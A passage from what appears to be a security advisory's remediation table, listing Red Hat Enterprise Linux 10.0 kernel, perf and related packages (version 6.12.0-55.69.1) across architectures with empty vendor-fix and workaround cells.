| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
